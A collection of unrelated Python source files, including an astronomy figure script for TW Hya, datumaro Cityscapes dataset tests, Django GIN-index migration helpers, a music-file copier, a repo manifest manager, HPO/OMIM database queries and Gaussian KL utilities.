ax2 = fig.add_subplot(gs[0,2])
ax2.set_xlim(xlims)
ax2.set_ylim(ylims)
ax2.set_xticklabels([])
ax2.set_yticklabels([])
# annotations
ax0.text(0.08, 0.91, 'a', transform=ax0.transAxes,
horizontalalignment='right', color='w', fontsize=15,
bbox={'facecolor': 'black', 'alpha': 0.8, 'pad': 2})
ax1.text(0.08, 0.91, 'b', transform=ax1.transAxes,
horizontalalignment='right', color='w', fontsize=15,
bbox={'facecolor': 'black', 'alpha': 0.8, 'pad': 2})
ax2.text(0.08, 0.91, 'c', transform=ax2.transAxes,
horizontalalignment='right', color='w', fontsize=15,
bbox={'facecolor': 'black', 'alpha': 0.8, 'pad': 2})
ax0.text(0.96, 0.03, '\\textit{scattered light}', transform=ax0.transAxes,
horizontalalignment='right', color='w', fontsize=11,
bbox={'facecolor': 'black', 'alpha': 0.8, 'pad': 2})
ax1.text(0.96, 0.03, '\\textit{thermal continuum}', transform=ax1.transAxes,
horizontalalignment='right', color='w',fontsize=11,
bbox={'facecolor': 'black', 'alpha': 0.8, 'pad': 2})
ax2.text(0.96, 0.03, '\\textit{spectral line emission}',
transform=ax2.transAxes,
horizontalalignment='right', color='w',fontsize=11,
bbox={'facecolor': 'black', 'alpha': 0.8, 'pad': 2})
# SCATTERED LIGHT
hdulist = fits.open('data/Hband_Qr_cleaned.fits_smooth')
Iscat = hdulist[0].data[0]
hdr = hdulist[0].header
nx, ny = hdr['NAXIS1'], hdr['NAXIS2']
cellsize = 12.25 * 1e-3 # in arcseconds (based on IRDIS plate scale)
RA, DEC = np.meshgrid(cellsize*(np.arange(nx)-0.5*nx+0.5), \
cellsize*(np.arange(ny)-0.5*ny+0.5))
ext = (np.max(RA), np.min(RA), np.min(DEC), np.max(DEC))
norm = ImageNormalize(vmin=10, vmax=45, stretch=LinearStretch())
im = ax0.imshow(Iscat, origin='lower', cmap='afmhot', extent=ext,
aspect='equal', norm=norm)
beam = Ellipse((xlims[0] + 0.08*np.diff(xlims), xlims[1] - 0.06*np.diff(xlims)),
0.049, 0.049, 0.)
beam.set_facecolor('w')
ax0.add_artist(beam)
#ax0.plot([-5,5],[0,0],'green')
#ax0.plot([0,0],[-5,5],'green')
# MM CONTINUUM
idir = '/pool/asha0/TALKS/2017/Texas/data/'
hdulist = fits.open(idir+'B6B7_cont.image.tt0.fits')
Imm = np.squeeze(hdulist[0].data)
hdr = hdulist[0].header
beam = (np.pi/180.)**2 * np.pi * hdr['BMAJ'] * hdr['BMIN'] / (4.*np.log(2.))
nu = hdr['CRVAL3']
cc, kk = 2.9979e10, 1.381e-16
Tb = (1e-23 * Imm / beam) * cc**2 / (2.*kk*nu**2)
RA = 3600. * hdr['CDELT1'] * (np.arange(hdr['NAXIS1'])-(hdr['CRPIX1']-1))
DEC = 3600. * hdr['CDELT2'] * (np.arange(hdr['NAXIS2'])-(hdr['CRPIX2']-1))
ext = (np.max(RA)-0.012, np.min(RA)-0.012, np.min(DEC)-0.015, np.max(DEC)-0.015)
norm = ImageNormalize(vmin=0, vmax=40, stretch=AsinhStretch())
im = ax1.imshow(Tb, origin='lower', cmap='inferno', extent=ext,
aspect='equal', norm=norm)
beam = Ellipse((xlims[0] + 0.08*np.diff(xlims), xlims[1] - 0.06*np.diff(xlims)),
hdr['BMAJ']*3600., hdr['BMIN']*3600., 90.-hdr['BPA'])
beam.set_facecolor('w')
ax1.add_artist(beam)
#ax1.plot([-5,5],[0,0],'green')
#ax1.plot([0,0],[-5,5],'green')
# CO
hdulist = fits.open('data/TWHya_CO_highres.pbcor.mom0.clipped.fits')
Ico = np.nan_to_num(np.squeeze(hdulist[0].data))
hdr = hdulist[0].header
RA = 3600. * hdr['CDELT1'] * (np.arange(hdr['NAXIS1'])-(hdr['CRPIX1']-1))
DEC = 3600. * hdr['CDELT2'] * (np.arange(hdr['NAXIS2'])-(hdr['CRPIX2']-1))
ext = (np.max(RA)+0.05, np.min(RA)+0.05, np.min(DEC)-0.05, np.max(DEC)-0.05)
norm = ImageNormalize(vmin=0, vmax=0.3, stretch=AsinhStretch())
im = ax2.imshow(Ico, origin='lower', cmap='bone', extent=ext,
aspect='equal', norm=norm)
beam = Ellipse((xlims[0] + 0.08*np.diff(xlims), xlims[1] - 0.06*np.diff(xlims)),
hdr['BMAJ']*3600., hdr['BMIN']*3600., 90.-hdr['BPA'])
beam.set_facecolor('w')
ax2.add_artist(beam)
#ax2.plot([-5,5],[0,0],'green')
#ax2.plot([0,0],[-5,5],'green')
# adjustments for aesthetic purposes
fig.subplots_adjust(wspace=0.05)
fig.subplots_adjust(left=0.0, right=1.0, bottom=0.01, top=0.99)
fig.savefig('twhya_gallery.pdf')
fig.clf()
|
python
|
from collections import OrderedDict
from functools import partial
from unittest import TestCase
import os
import os.path as osp
import numpy as np
from datumaro.components.annotation import (
AnnotationType, LabelCategories, Mask, MaskCategories,
)
from datumaro.components.dataset import Dataset
from datumaro.components.extractor import DatasetItem, Extractor
from datumaro.plugins.cityscapes_format import (
CityscapesConverter, CityscapesImporter,
)
from datumaro.util.image import Image
from datumaro.util.test_utils import (
IGNORE_ALL, TestDir, compare_datasets, test_save_and_load,
)
import datumaro.plugins.cityscapes_format as Cityscapes
from .requirements import Requirements, mark_requirement
DUMMY_DATASET_DIR = osp.join(osp.dirname(__file__), 'assets',
'cityscapes_dataset')
class CityscapesFormatTest(TestCase):
@mark_requirement(Requirements.DATUM_267)
def test_can_write_and_parse_labelmap(self):
src_label_map = Cityscapes.CityscapesLabelMap
with TestDir() as test_dir:
file_path = osp.join(test_dir, 'label_colors.txt')
Cityscapes.write_label_map(file_path, src_label_map)
dst_label_map = Cityscapes.parse_label_map(file_path)
self.assertEqual(src_label_map, dst_label_map)
class CityscapesImportTest(TestCase):
@mark_requirement(Requirements.DATUM_267)
def test_can_import(self):
# is_crowd marks labels allowing to specify instance id
source_dataset = Dataset.from_iterable([
DatasetItem(id='defaultcity/defaultcity_000001_000031',
subset='test',
image=np.ones((1, 5, 3)),
annotations=[
Mask(np.array([[1, 1, 0, 0, 0]]), label=3,
attributes={'is_crowd': True}),
Mask(np.array([[0, 0, 1, 0, 0]]), id=1, label=27,
attributes={'is_crowd': False}),
Mask(np.array([[0, 0, 0, 1, 1]]), id=2, label=27,
attributes={'is_crowd': False}),
]
),
DatasetItem(id='defaultcity/defaultcity_000001_000032',
subset='test',
image=np.ones((1, 5, 3)),
annotations=[
Mask(np.array([[1, 1, 0, 0, 0]]), id=1, label=31,
attributes={'is_crowd': False}),
Mask(np.array([[0, 0, 1, 0, 0]]), label=12,
attributes={'is_crowd': True}),
Mask(np.array([[0, 0, 0, 1, 1]]), label=3,
attributes={'is_crowd': True}),
]
),
DatasetItem(id='defaultcity/defaultcity_000002_000045',
subset='train',
image=np.ones((1, 5, 3)),
annotations=[
Mask(np.array([[1, 1, 0, 1, 1]]), label=3,
attributes={'is_crowd': True}),
Mask(np.array([[0, 0, 1, 0, 0]]), id=1, label=24,
attributes={'is_crowd': False}),
]
),
DatasetItem(id='defaultcity/defaultcity_000001_000019',
subset = 'val',
image=np.ones((1, 5, 3)),
annotations=[
Mask(np.array([[1, 0, 0, 1, 1]]), label=3,
attributes={'is_crowd': True}),
Mask(np.array([[0, 1, 1, 0, 0]]), id=24, label=1,
attributes={'is_crowd': False}),
]
),
], categories=Cityscapes.make_cityscapes_categories())
parsed_dataset = Dataset.import_from(DUMMY_DATASET_DIR, 'cityscapes')
compare_datasets(self, source_dataset, parsed_dataset)
@mark_requirement(Requirements.DATUM_267)
def test_can_detect_cityscapes(self):
self.assertTrue(CityscapesImporter.detect(DUMMY_DATASET_DIR))
class TestExtractorBase(Extractor):
def _label(self, cityscapes_label):
return self.categories()[AnnotationType.label].find(cityscapes_label)[0]
def categories(self):
return Cityscapes.make_cityscapes_categories()
class CityscapesConverterTest(TestCase):
def _test_save_and_load(self, source_dataset, converter, test_dir,
target_dataset=None, importer_args=None, **kwargs):
return test_save_and_load(self, source_dataset, converter, test_dir,
importer='cityscapes',
target_dataset=target_dataset, importer_args=importer_args, **kwargs)
@mark_requirement(Requirements.DATUM_267)
def test_can_save_segm(self):
class TestExtractor(TestExtractorBase):
def __iter__(self):
return iter([
DatasetItem(id='defaultcity_1_2', subset='test',
image=np.ones((1, 5, 3)),
annotations=[
Mask(np.array([[0, 0, 0, 1, 0]]), label=3,
attributes={'is_crowd': True}),
Mask(np.array([[0, 1, 1, 0, 0]]), label=24, id=1,
attributes={'is_crowd': False}),
Mask(np.array([[1, 0, 0, 0, 1]]), label=15,
attributes={'is_crowd': True}),
]
),
DatasetItem(id='defaultcity_3', subset='val',
image=np.ones((1, 5, 3)),
annotations=[
Mask(np.array([[1, 1, 0, 1, 1]]), label=3,
attributes={'is_crowd': True}),
Mask(np.array([[0, 0, 1, 0, 0]]), label=5,
attributes={'is_crowd': True}),
]
),
])
with TestDir() as test_dir:
self._test_save_and_load(TestExtractor(),
partial(CityscapesConverter.convert, label_map='cityscapes',
save_images=True), test_dir)
@mark_requirement(Requirements.DATUM_267)
def test_can_save_with_no_subsets(self):
class TestExtractor(TestExtractorBase):
def __iter__(self):
return iter([
DatasetItem(id='defaultcity_1_2',
image=np.ones((1, 5, 3)),
annotations=[
Mask(np.array([[1, 0, 0, 1, 0]]), label=0,
attributes={'is_crowd': True}),
Mask(np.array([[0, 1, 1, 0, 1]]), label=3,
attributes={'is_crowd': True}),
]
),
DatasetItem(id='defaultcity_1_3',
image=np.ones((1, 5, 3)),
annotations=[
Mask(np.array([[1, 1, 0, 1, 0]]), label=1,
attributes={'is_crowd': True}),
Mask(np.array([[0, 0, 1, 0, 1]]), label=2,
attributes={'is_crowd': True}),
]
),
])
with TestDir() as test_dir:
self._test_save_and_load(TestExtractor(),
partial(CityscapesConverter.convert, label_map='cityscapes',
save_images=True), test_dir)
@mark_requirement(Requirements.DATUM_267)
def test_can_save_dataset_with_cyrillic_and_spaces_in_filename(self):
class TestExtractor(TestExtractorBase):
def __iter__(self):
return iter([
DatasetItem(id='кириллица с пробелом',
image=np.ones((1, 5, 3)),
annotations=[
Mask(np.array([[1, 0, 0, 1, 1]]), label=3,
attributes={'is_crowd': True}),
Mask(np.array([[0, 1, 1, 0, 0]]), label=24, id=1,
attributes={'is_crowd': False}),
]
),
])
with TestDir() as test_dir:
self._test_save_and_load(TestExtractor(),
partial(CityscapesConverter.convert, label_map='cityscapes',
save_images=True), test_dir)
@mark_requirement(Requirements.DATUM_267)
def test_can_save_with_relative_path_in_id(self):
class TestExtractor(TestExtractorBase):
def __iter__(self):
return iter([
DatasetItem(id='a/b/1', subset='test',
image=np.ones((1, 5, 3)),
annotations=[
Mask(np.array([[1, 0, 0, 1, 1]]), label=3,
attributes={'is_crowd': True}),
Mask(np.array([[0, 1, 1, 0, 0]]), label=24, id=1,
attributes={'is_crowd': False}),
]
),
])
with TestDir() as test_dir:
self._test_save_and_load(TestExtractor(),
partial(CityscapesConverter.convert, label_map='cityscapes',
save_images=True), test_dir)
@mark_requirement(Requirements.DATUM_267)
def test_can_save_with_no_masks(self):
class TestExtractor(TestExtractorBase):
def __iter__(self):
return iter([
DatasetItem(id='city_1_2', subset='test',
image=np.ones((2, 5, 3)),
),
])
with TestDir() as test_dir:
self._test_save_and_load(TestExtractor(),
partial(CityscapesConverter.convert, label_map='cityscapes',
save_images=True), test_dir)
@mark_requirement(Requirements.DATUM_267)
def test_dataset_with_source_labelmap_undefined(self):
source_dataset = Dataset.from_iterable([
DatasetItem(id=1, image=np.ones((1, 5, 3)), annotations=[
Mask(np.array([[1, 0, 0, 1, 1]]), label=0),
Mask(np.array([[0, 1, 1, 0, 0]]), label=1),
]),
], categories=['a', 'b'])
class DstExtractor(TestExtractorBase):
def __iter__(self):
yield DatasetItem(id=1, image=np.ones((1, 5, 3)), annotations=[
Mask(np.array([[1, 0, 0, 1, 1]]),
attributes={'is_crowd': False}, id=1,
label=self._label('a')),
Mask(np.array([[0, 1, 1, 0, 0]]),
attributes={'is_crowd': False}, id=2,
label=self._label('b')),
])
def categories(self):
label_map = OrderedDict()
label_map['background'] = None
label_map['a'] = None
label_map['b'] = None
return Cityscapes.make_cityscapes_categories(label_map)
with TestDir() as test_dir:
self._test_save_and_load(source_dataset,
partial(CityscapesConverter.convert, label_map='source',
save_images=True), test_dir, target_dataset=DstExtractor())
@mark_requirement(Requirements.DATUM_267)
def test_dataset_with_source_labelmap_defined(self):
class SrcExtractor(TestExtractorBase):
def __iter__(self):
yield DatasetItem(id=1, image=np.ones((1, 5, 3)), annotations=[
Mask(np.array([[1, 0, 0, 1, 1]]), label=1, id=1,
attributes={'is_crowd': False}),
Mask(np.array([[0, 1, 1, 0, 0]]), label=2, id=2,
attributes={'is_crowd': False}),
])
def categories(self):
label_map = OrderedDict()
label_map['background'] = (0, 0, 0)
label_map['label_1'] = (1, 2, 3)
label_map['label_2'] = (3, 2, 1)
return Cityscapes.make_cityscapes_categories(label_map)
class DstExtractor(TestExtractorBase):
def __iter__(self):
yield DatasetItem(id=1, image=np.ones((1, 5, 3)), annotations=[
Mask(np.array([[1, 0, 0, 1, 1]]),
attributes={'is_crowd': False}, id=1,
label=self._label('label_1')),
Mask(np.array([[0, 1, 1, 0, 0]]),
attributes={'is_crowd': False}, id=2,
label=self._label('label_2')),
])
def categories(self):
label_map = OrderedDict()
label_map['background'] = (0, 0, 0)
label_map['label_1'] = (1, 2, 3)
label_map['label_2'] = (3, 2, 1)
return Cityscapes.make_cityscapes_categories(label_map)
with TestDir() as test_dir:
self._test_save_and_load(SrcExtractor(),
partial(CityscapesConverter.convert, label_map='source',
save_images=True), test_dir, target_dataset=DstExtractor())
@mark_requirement(Requirements.DATUM_267)
def test_can_save_and_load_image_with_arbitrary_extension(self):
class TestExtractor(TestExtractorBase):
def __iter__(self):
return iter([
DatasetItem(id='q',
image=Image(path='q.JPEG', data=np.zeros((4, 3, 3)))
),
DatasetItem(id='w',
image=Image(path='w.bmp', data=np.ones((1, 5, 3))),
annotations=[
Mask(np.array([[1, 0, 0, 1, 0]]), label=0,
attributes={'is_crowd': True}),
Mask(np.array([[0, 1, 1, 0, 1]]), label=1,
attributes={'is_crowd': True}),
]),
])
def categories(self):
label_map = OrderedDict()
label_map['a'] = None
label_map['b'] = None
return Cityscapes.make_cityscapes_categories(label_map)
with TestDir() as test_dir:
self._test_save_and_load(TestExtractor(),
partial(CityscapesConverter.convert, save_images=True),
test_dir, require_images=True)
@mark_requirement(Requirements.DATUM_GENERAL_REQ)
def test_inplace_save_writes_only_updated_data(self):
src_mask_cat = MaskCategories.generate(2, include_background=False)
expected = Dataset.from_iterable([
DatasetItem(1, subset='a', image=np.ones((2, 1, 3)),
annotations=[
Mask(np.ones((2, 1)), label=2, id=1)
]),
DatasetItem(2, subset='a', image=np.ones((3, 2, 3))),
DatasetItem(2, subset='b', image=np.ones((2, 2, 3)),
annotations=[
Mask(np.ones((2, 2)), label=1, id=1)
]),
], categories=Cityscapes.make_cityscapes_categories(OrderedDict([
('a', src_mask_cat.colormap[0]),
('b', src_mask_cat.colormap[1]),
])))
with TestDir() as path:
dataset = Dataset.from_iterable([
DatasetItem(1, subset='a', image=np.ones((2, 1, 3)),
annotations=[
Mask(np.ones((2, 1)), label=1)
]),
DatasetItem(2, subset='b', image=np.ones((2, 2, 3)),
annotations=[
Mask(np.ones((2, 2)), label=0)
]),
DatasetItem(3, subset='c', image=np.ones((2, 3, 3)),
annotations=[
Mask(np.ones((2, 2)), label=0)
]),
], categories={
AnnotationType.label: LabelCategories.from_iterable(['a', 'b']),
AnnotationType.mask: src_mask_cat
})
dataset.export(path, 'cityscapes', save_images=True)
dataset.put(DatasetItem(2, subset='a', image=np.ones((3, 2, 3))))
dataset.remove(3, 'c')
dataset.save(save_images=True)
self.assertEqual({'a', 'b'},
set(os.listdir(osp.join(path, 'gtFine'))))
self.assertEqual({
'1_gtFine_color.png', '1_gtFine_instanceIds.png',
'1_gtFine_labelIds.png'
},
set(os.listdir(osp.join(path, 'gtFine', 'a'))))
self.assertEqual({
'2_gtFine_color.png', '2_gtFine_instanceIds.png',
'2_gtFine_labelIds.png'
},
set(os.listdir(osp.join(path, 'gtFine', 'b'))))
self.assertEqual({'a', 'b'},
set(os.listdir(osp.join(path, 'imgsFine', 'leftImg8bit'))))
self.assertEqual({'1_leftImg8bit.png', '2_leftImg8bit.png'},
set(os.listdir(osp.join(path, 'imgsFine', 'leftImg8bit', 'a'))))
self.assertEqual({'2_leftImg8bit.png'},
set(os.listdir(osp.join(path, 'imgsFine', 'leftImg8bit', 'b'))))
compare_datasets(self, expected,
Dataset.import_from(path, 'cityscapes'),
require_images=True, ignored_attrs=IGNORE_ALL)
@mark_requirement(Requirements.DATUM_BUG_470)
def test_can_save_and_load_without_image_saving(self):
class TestExtractor(TestExtractorBase):
def __iter__(self):
return iter([
DatasetItem(id='a', subset='test',
image=np.ones((1, 5, 3)),
annotations=[
Mask(np.array([[0, 1, 1, 1, 0]]), label=3,
attributes={'is_crowd': True}),
Mask(np.array([[1, 0, 0, 0, 1]]), label=4,
attributes={'is_crowd': True}),
]
),
])
with TestDir() as test_dir:
self._test_save_and_load(TestExtractor(),
partial(CityscapesConverter.convert, label_map='cityscapes'),
test_dir
)
|
python
|
"""
Django 1.10.5 doesn't support migrations/updates for fulltext fields, and django-pg-fts isn't
actively maintained; its current codebase is broken across various versions of Django.
Because of that, I decided to implement our own migrations, with the intent to drop them once
Django develops its own solution.
"""
import copy
from django.db.migrations.operations.base import Operation
class BaseSQL(Operation):
"""
Allows creating parameterized SQL migrations.
"""
forward_sql = None
backward_sql = None
sql_opts = {}
@property
def sql(self):
return self.forward_sql.format(**self.sql_opts)
@property
def reverse_sql(self):
return self.backward_sql.format(**self.sql_opts)
def __init__(self, **kwargs):
sql_opts = copy.copy(self.sql_opts)
sql_opts.update(kwargs)
self.sql_opts = sql_opts
def database_forwards(self, app_label, schema_editor, from_state, to_state):
schema_editor.execute(self.sql)
def database_backwards(self, app_label, schema_editor, from_state, to_state):
schema_editor.execute(self.reverse_sql)
def state_forwards(self, app_label, state):
pass
class GINIndex(BaseSQL):
"""
Index operations share some parts, e.g. dropping the index in the backward migration.
"""
forward_sql = """
CREATE INDEX {table}_{field}_{index_suffix} ON \"{table}\"
USING GIN({expression} {index_opts})
"""
backward_sql = """
DROP INDEX {table}_{field}_{index_suffix}
"""
sql_opts = {
"index_opts": "",
}
class MultiFieldTRGMIndex(GINIndex):
"""
Create a gin-based trigram index on a set of fields.
"""
sql_opts = {"index_opts": "", "index_suffix": "trigram_index"}
@property
def sql(self):
def index_field(field_name):
return f"UPPER({field_name}) gin_trgm_ops"
self.sql_opts["expression"] = ",".join(
map(index_field, self.sql_opts["from_fields"])
)
return self.forward_sql.format(**self.sql_opts)
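# A usage sketch (hypothetical app, table and field names, not part of this module).
# These operations are meant to be listed in a migration's `operations`; the trigram
# index additionally assumes the pg_trgm extension is installed:
#
#   from django.db import migrations
#
#   class Migration(migrations.Migration):
#       dependencies = [("app", "0001_initial")]
#       operations = [
#           MultiFieldTRGMIndex(table="app_model", field="search",
#                               from_fields=["first_name", "last_name"]),
#       ]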
|
python
|
import os
import argparse
import shutil
from datetime import datetime,timedelta
def main():
'''
the driver
'''
args = parse()
files = get_files(args)
if confirm(files):
copy_files(files,args)
def parse():
'''
sets the args needed to run and returns them
'''
#defaults
timestamp = datetime.now().strftime("%Y%m%dT%H%M%S")
output_root_default = f"./out/recent_{timestamp}/"
parser = argparse.ArgumentParser(description='Creates copies of recently changed files or directories and places them in a local directory with the same folder structure')
parser.add_argument('-d','--directory',dest='dir',type=str, required=True, help='the directory to find files in')
parser.add_argument('-t','--timespan','--days', dest='timespan', required=True, help='number of days prior to the current date to search for')
parser.add_argument('-o','--output', dest='output_root',default=output_root_default, help=f"output path (optional, defaults to {output_root_default})")
args = parser.parse_args()
#standardize directory
args.dir = os.path.expanduser(args.dir) if args.dir.startswith('~') else os.path.abspath(args.dir)
#calculate the min date to search for
args.threshold = datetime.today() - timedelta(days=int(args.timespan))
return args
def get_files(args):
'''
gets the array of files to partition
'''
directory = args.dir
threshold = args.threshold
print(f'walking {directory}')
found = []
for root,_,files in os.walk(directory):
for f in files:
path = os.path.join(root, f)
if(is_music(path) and is_recent(path,threshold)):
found.append(path)
return found
def is_recent(f,threshold_date):
"""
returns if modified date >= threshold date
"""
modified_date = datetime.fromtimestamp(os.path.getmtime(f))
return modified_date >= threshold_date
def is_music(f):
"""
returns if path, f, is a music file
"""
music_exts = ['3gp','aa','aac','aax','act','aiff','alac','amr','ape','au','awb','dct','dss','dsd','dsf','dvf','flac','gsm','iklax','ivs','m4a','m4b','m4p','mmf','mp3','mpc','msv','nmf','ogg','opus','ra','raw','rf64','sln','tta','voc','vox','wav','wma','wv','webm','8svx','cda']
return f.split('.')[-1] in music_exts
def copy_files(sources, args):
'''
copies files from directory to output
'''
directory = args.dir
output_root = args.output_root
os.makedirs(os.path.abspath(output_root),exist_ok=True)
for file in sources:
relpath = get_path_relroot(file,directory)
newpath = os.path.abspath(os.path.join(output_root,relpath))
os.makedirs(os.path.dirname(newpath),exist_ok=True)
shutil.copy(file,newpath)
def confirm(files):
'''
displays info and asks for confirm
'''
if len(files) == 0:
print('No files found. Exiting.')
exit()
totalsize = sum([os.path.getsize(f) for f in files])/1.0e6
print("Found {0} file(s) totalling {1:.2f}MB".format(len(files),totalsize))
print('Proceed with copying? (Y/n)')
choice = input()
return choice.upper() == 'Y'
def get_path_relroot(path,root):
'''
remove the root folder path we supplied earlier
this is quick and dirty
'''
return path.replace(root,'').strip(os.sep)
if __name__== "__main__": main()
|
python
|
import yaml
from pathlib import Path
from .repo import serialize_repo, deserialize_repo
from .validation import validate_manifest
from ..exception import AppException
from ..env import MANIFEST_PATH_DEFAULT
from ..logger import get_logger
from ..utils import to_absolute_path, validate_writable_directory
def serialize_manifest(raw_manifest):
get_logger().info("Serializing manifest changes")
for repo in raw_manifest["repos"]:
repo = serialize_repo(repo)
return raw_manifest
def deserialize_manifest(raw_manifest):
get_logger().info("Deserializing manifest changes")
for repo in raw_manifest["repos"]:
repo = deserialize_repo(repo)
return raw_manifest
EMPTY_MANIFEST = {"repos": []}
def load_manifest(manifest_path):
get_logger().info("Loading manifest")
if manifest_path.exists():
with open(manifest_path) as f:
data = f.read()
data = yaml.safe_load(data) if data.strip() else EMPTY_MANIFEST
data = validate_manifest(data)
return deserialize_manifest(data)
get_logger().info("Manifest not specified, using default manifest")
default_manifest_directory = to_absolute_path(Path(MANIFEST_PATH_DEFAULT)).parent
if not default_manifest_directory.exists():
get_logger().warning(
f'Default directory "{default_manifest_directory}" not found, creating'
)
default_manifest_directory.mkdir(parents=True)
parent_path = manifest_path.parent
validation_error = validate_writable_directory(parent_path)
if validation_error:
raise AppException(validation_error)
return EMPTY_MANIFEST
def save_manifest(manifest_path, manifest):
get_logger().info("Saving manifest")
with open(manifest_path, "w") as f:
f.write(yaml.dump(serialize_manifest(manifest)))
def update(manifest, repo_location, *, repo_remotes=None, default_fetch_remote=None):
found_repo = None
for repo in manifest["repos"]:
if repo["location"] == repo_location:
found_repo = repo
if not found_repo:
raise AppException(f'Path "{repo_location}" is not a registered repo')
if repo_remotes:
found_repo["remotes"] = repo_remotes
if default_fetch_remote:
found_repo["default_fetch_remote"] = default_fetch_remote
return manifest
def add_repo(manifest, new_repo, force):
get_logger().info(f'Adding repository from "{new_repo["location"]}"')
should_overwrite_repos = False
location = new_repo["location"]
for repo in manifest["repos"]:
if repo["location"] == location:
if force:
get_logger().warning(
f'Repository located at "{location}" already found, overwriting'
)
should_overwrite_repos = True
break
else:
raise AppException(f'Path "{location}" is already registered repo')
if should_overwrite_repos:
return update(
manifest,
location,
repo_remotes=new_repo["remotes"],
default_fetch_remote=new_repo.get("default_fetch_remote"),
)
manifest["repos"].append(new_repo)
return manifest
def remove_repo(manifest, repo_location, force):
get_logger().info(f'Removing repository from "{repo_location}"')
original_length = len(manifest["repos"])
manifest["repos"] = [
repo for repo in manifest["repos"] if repo["location"] != repo_location
]
if original_length == len(manifest["repos"]):
message = f'Repo "{repo_location}" not found in the manifest'
if force:
get_logger().warning(message)
else:
raise AppException(message)
return manifest
|
python
|
import logging
import sqlite3
from phizz.database import get_cursor
from . import GENE_DB
logger = logging.getLogger(__name__)
def query_hpo(hpo_terms, database=None, connection=None):
"""Query with hpo terms
If no database is given, use the one bundled with the package.
Args:
hpo_terms (iterator): An iterator with hpo terms
database (str): Path to database
Returns:
answer (list): A list of dictionaries where each dictionary
represents a hpo term on the form {'hpo_term': <hpo_term>,
'description':<description>}
"""
cursor = get_cursor(
path_to_database=database,
connection=connection
)
answer = []
for hpo_term in hpo_terms:
try:
hpo_term = int(hpo_term.lstrip('HP:'))
except ValueError as e:
logger.error("{0} is not a valid HPO term".format(hpo_term))
raise e
hpo_result = cursor.execute("SELECT * FROM hpo"\
" WHERE hpo_id = '{0}'".format(hpo_term)).fetchall()
for row in hpo_result:
answer.append({
'hpo_term': row['name'],
'description': row['description']
})
return answer
def query_disease(disease_terms, database=None, connection=None):
"""Query with diseae terms
If no databse is given use the one that follows with package
Args:
hpo_terms (iterator): An iterator with hpo terms
database (str): Path to database
Returns:
answer (list): A list of dictionaries where each dictionary
represents a hpo term on the form {'hpo_term': <hpo_term>,
'description':<description>}
"""
cursor = get_cursor(
path_to_database=database,
connection=connection
)
answer = []
for disease_term in disease_terms:
try:
disease_term = int(disease_term.lstrip('OMIM:'))
logger.debug("Querying diseases with {0}".format(disease_term))
except ValueError as e:
logger.error("{0} is not a valid OMIM term".format(disease_term))
raise e
result = cursor.execute("SELECT hpo.name, hpo.description"\
" FROM hpo, disease WHERE"\
" hpo.hpo_id = disease.mim_hpo"\
" AND disease.mim_nr = ?", (str(disease_term),)).fetchall()
for hpo_row in result:
answer.append({
'hpo_term': hpo_row['name'],
'description': hpo_row['description']
})
return answer
def query_gene(ensembl_id=None, hgnc_symbol=None, database=None, connection=None):
"""Query with gene symbols, either hgnc or ensembl
If no database is given, use the one bundled with the package.
Args:
ensembl_id (str): An Ensembl gene id
hgnc_symbol (str): A hgnc symbol
database (str): Path to database
Returns:
answer (iterator)
"""
cursor = get_cursor(
path_to_database=database,
connection=connection
)
result = []
if not (ensembl_id or hgnc_symbol):
raise SyntaxError("Use gene identifier to query")
if ensembl_id:
if not ensembl_id.startswith("ENSG"):
raise ValueError("invalid format for ensemb id")
logger.debug("Querying genes with ensembl id {0}".format(ensembl_id))
result = cursor.execute("SELECT * FROM gene WHERE"\
" ensembl_id = ?" , (ensembl_id,)).fetchall()
else:
logger.debug("Querying genes with hgnc symbol {0}".format(hgnc_symbol))
result = cursor.execute("SELECT * FROM gene WHERE"\
" hgnc_symbol = ?" , (hgnc_symbol,)).fetchall()
return result
def query_gene_symbol(chrom, start, stop):
"""Query the gene trees with an interval and return the gene symbols overlapped
Args:
chrom(str)
start(int)
stop(int)
Returns:
gene_symbols(list(str))
"""
logger.info("Querying gene trees with chrom: {0}, start:{1}, stop{2}".format(
chrom, start, stop
))
# strip a leading 'chr'/'CHR' prefix so the lookup key matches the annotation file
chrom = chrom.lstrip('chrCHR')
interval = [int(start), int(stop)]
gene_symbols = set()
try:
gene_tree = GENE_DB[chrom]
gene_symbols = gene_tree.find_range(interval)
except KeyError:
logger.warning("Chromosome {0} is not in annotation file".format(chrom))
return gene_symbols
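# A minimal usage sketch (hypothetical terms, illustration only), relying on the
# bundled database when `database`/`connection` are left as None:
#
#   query_hpo(['HP:0000252'])
#   query_disease(['OMIM:614113'])
#   query_gene(hgnc_symbol='ADK')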
|
python
|
import numpy as np
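# Closed-form KL divergence between two multivariate Gaussians, as implemented in
# gaussian_KL below (a standard identity, stated here for reference):
#   KL(N(mu0, Sig0) || N(mu1, Sig1))
#     = 0.5 * [ tr(Sig1^-1 Sig0) + (mu1 - mu0)^T Sig1^-1 (mu1 - mu0)
#               - k + ln(det Sig1 / det Sig0) ],   where k = dim(mu0).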
def gaussian_KL(mu0, Sig0, mu1, Sig1inv):
t1 = np.dot(Sig1inv, Sig0).trace()
t2 = np.dot((mu1-mu0),np.dot(Sig1inv, mu1-mu0))
t3 = -np.linalg.slogdet(Sig1inv)[1] - np.linalg.slogdet(Sig0)[1]
return 0.5*(t1+t2+t3-mu0.shape[0])
def weighted_post_KL(th0, Sig0inv, sigsq, X, Y, w, reverse=True):
muw, Sigw = weighted_post(th0, Sig0inv, sigsq, X, Y, w)
mup, Sigp = weighted_post(th0, Sig0inv, sigsq, X, Y, np.ones(X.shape[0]))
if reverse:
return gaussian_KL(muw, Sigw, mup, np.linalg.inv(Sigp))
else:
return gaussian_KL(mup, Sigp, muw, np.linalg.inv(Sigw))
def weighted_post(th0, Sig0inv, sigsq, X, Y, w):
Sigp = np.linalg.inv(Sig0inv + (w[:, np.newaxis]*X).T.dot(X)/sigsq)
mup = np.dot(Sigp, np.dot(Sig0inv,th0) + (w[:, np.newaxis]*Y[:,np.newaxis]*X).sum(axis=0)/sigsq )
return mup, Sigp
def potentials(sigsq, X, Y, samples):
XST = X.dot(samples.T)
return -1./2.*np.log(2.*np.pi*sigsq) - 1./(2.*sigsq)*(Y[:,np.newaxis]**2 - 2*XST*Y[:,np.newaxis] + XST**2)
|
python
|
# <editor-fold desc="Description">
x = 'foo' + 'bar'
# </editor-fold>
|
python
|
import numpy as np
from matplotlib import pyplot as plt
import seaborn as sb
from utils.data_handling import load_config
def get_colors():
cfg = load_config()
sb.set_style(cfg['plotting']['seaborn']['style'])
sb.set_context(cfg['plotting']['seaborn']['context']['context'],
font_scale=cfg['plotting']['seaborn']['context']['font scale'],
rc=cfg['plotting']['seaborn']['context']['rc'])
